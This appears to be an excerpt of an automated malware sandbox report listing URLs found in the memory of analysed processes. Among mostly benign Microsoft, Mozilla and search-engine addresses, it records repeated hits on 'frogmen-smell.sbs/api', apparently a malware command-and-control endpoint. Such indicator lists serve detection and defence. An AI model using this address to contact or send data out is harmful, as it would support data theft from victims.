Source: svchost.exe, 00000002.00000003.1796255477.0000014104678000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000002.00000003.1796255477.0000014104678000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000002.00000003.1796255477.0000014104678000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000002.00000003.1796255477.00000141046AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000002.00000003.1796255477.00000141046F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: e708276138.exe, 00000013.00000002.2912096877.0000000001300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsof
Source: 76f1524c8d.exe, 00000018.00000002.2892554824.00000000009FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: e708276138.exe, 00000013.00000003.2607124182.0000000005B33000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2733169975.0000000005980000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2821844177.0000000005642000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: e708276138.exe, 00000013.00000003.2607124182.0000000005B33000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2733169975.0000000005980000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2821844177.0000000005642000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://vinylcut.co.za/activation
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.VinylCut.co.za
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/activation/createspace
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/activation/createspace/activate.php?Dhttps://www.craftedge.com/activation/s
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/activation/cut
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/activation/greatcut
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/activation/greatcut/activate.php?Ahttps://www.craftedge.com/activation/sure
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/activation/magiccutdstudio/activate.php?Dhttps://www.craftedge.com/activati
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/activation/magiccutstudio
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/activation/scal
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/activation/scal/activate.php?Dhttps://www.craftedge.com/activation/surecuts
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/activation/smartprint/activate.php?
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/purchase/smartprint.http://www.craftedge.com/activation/smartprintChttps://
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.com/purchaseUTrial
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.comGTrial
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.comNTrial
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.craftedge.comPTrial
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.easycutpro.com
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.easycutstudio.com
Source: stories.exe, 0000000C.00000003.2432246049.000000007FBE0000.00000004.00001000.00020000.00000000.sdmp, stories.exe, 0000000C.00000003.2431755881.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 0000000D.00000000.2433580876.0000000000401000.00000020.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: stories.exe, 0000000C.00000000.2430258936.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: file.exe, 00000000.00000002.2070728009.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.pss.co
Source: stories.exe, 0000000C.00000003.2432246049.000000007FBE0000.00000004.00001000.00020000.00000000.sdmp, stories.exe, 0000000C.00000003.2431755881.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 0000000D.00000000.2433580876.0000000000401000.00000020.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.signwarehouse.com
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.signwarehouse.comRTrial
Source: file.exe, 00000000.00000002.2069566640.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2061944828.000000001DA3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.starcraftvinyl.com/activate
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.starcraftvinyl.com/create&http://www.starcraftvinyl.com/activate
Source: shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.starcraftvinyl.com/createDTrial
Source: e708276138.exe, 00000013.00000003.2607124182.0000000005B33000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2733169975.0000000005980000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2821844177.0000000005642000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: e708276138.exe, 00000013.00000003.2607124182.0000000005B33000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2733169975.0000000005980000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2821844177.0000000005642000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2608720245.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2827320190.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2827320190.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2608720245.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2827320190.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2827320190.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: e708276138.exe, 00000013.00000003.2629429507.0000000001380000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2810154931.0000000005AF7000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2591180286.0000000001390000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2643010138.0000000001375000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2795399265.000000000138D000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2629912984.0000000001376000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2573057992.000000000136E000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2629526422.000000000138C000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2629599358.000000000139E000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2573057992.0000000001375000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2573280246.0000000001379000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2591576918.0000000001390000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2734435269.0000000001375000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2796038057.0000000001378000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2630047936.0000000001387000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2654960199.0000000001375000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2795537955.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2657179630.0000000001375000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2675472479.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2734151402.000000000139E000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2645547169.0000000001387000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/
Source: e708276138.exe, 00000017.00000003.2910583700.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000002.2957132719.0000000000E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/&
Source: e708276138.exe, 00000015.00000003.2816346098.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2796621255.00000000013C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/3
Source: e708276138.exe, 00000017.00000002.2955044148.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/:
Source: e708276138.exe, 00000013.00000003.2675472479.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/Fc
Source: e708276138.exe, 00000017.00000003.2910583700.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000002.2957132719.0000000000E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/U
Source: e708276138.exe, 00000013.00000003.2795537955.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2675472479.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/W
Source: e708276138.exe, 00000017.00000002.2957132719.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2892200711.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2891016152.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/api
Source: e708276138.exe, 00000013.00000003.2629429507.0000000001380000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2629526422.000000000138C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/api8
Source: e708276138.exe, 00000015.00000003.2957471962.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2910583700.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2905603314.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2910370944.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000002.2957132719.0000000000E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/api9
Source: e708276138.exe, 00000017.00000003.2910370944.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/apiW7
Source: e708276138.exe, 00000015.00000003.2731254010.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2733750270.00000000013B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/apieG
Source: e708276138.exe, 00000015.00000003.2731254010.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2733750270.00000000013B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/apil
Source: e708276138.exe, 00000013.00000003.2645547169.0000000001387000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2642881076.0000000001385000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2854908105.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/e
Source: e708276138.exe, 00000017.00000003.2854908105.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/f
Source: e708276138.exe, 00000017.00000003.2854908105.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/h
Source: e708276138.exe, 00000015.00000003.2754538301.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2757764233.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2760357723.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2754879744.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2730989943.00000000013D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/i
Source: e708276138.exe, 00000015.00000003.2816346098.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2796621255.00000000013C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/k
Source: e708276138.exe, 0000001E.00000002.3103547372.000000000116D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/l
Source: e708276138.exe, 00000017.00000003.2854908105.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/m
Source: e708276138.exe, 00000013.00000003.2573057992.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/mv
Source: e708276138.exe, 00000015.00000003.2754538301.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2757764233.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2760357723.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2754879744.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2730989943.00000000013D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/q
Source: e708276138.exe, 00000013.00000003.2645547169.0000000001387000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2642881076.0000000001385000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/ro
Source: e708276138.exe, 00000017.00000003.2872275644.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/tAc:
Source: e708276138.exe, 00000013.00000003.2795537955.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/ty
Source: e708276138.exe, 0000001E.00000002.3103547372.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/v
Source: e708276138.exe, 00000013.00000003.2645547169.0000000001387000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2642881076.0000000001385000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/z
Source: e708276138.exe, 00000015.00000002.3040356787.0000000001335000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000002.2955044148.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs:443/api
Source: e708276138.exe, 00000017.00000002.2955044148.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs:443/apiW
Source: e708276138.exe, 00000017.00000002.2955044148.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs:443/apitPK
Source: svchost.exe, 00000002.00000003.1796255477.0000014104722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000002.00000003.1796255477.000001410475F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000002.00000003.1796255477.0000014104722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000002.00000003.1796255477.0000014104703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000002.00000003.1796255477.0000014104722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: e708276138.exe, 00000017.00000003.2827320190.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: e708276138.exe, 00000023.00000003.3082453160.0000000005A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://learn.microsof
Source: svchost.exe, 00000002.00000003.1796255477.0000014104722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000002.00000003.1796255477.00000141046B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: e708276138.exe, 00000013.00000003.2573741961.0000000005B50000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2699349639.00000000059B0000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2784313428.0000000005662000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2973388577.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: e708276138.exe, 00000017.00000003.2826453007.000000000572C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: e708276138.exe, 00000017.00000003.2826453007.000000000572C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1967046345.0000000023CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
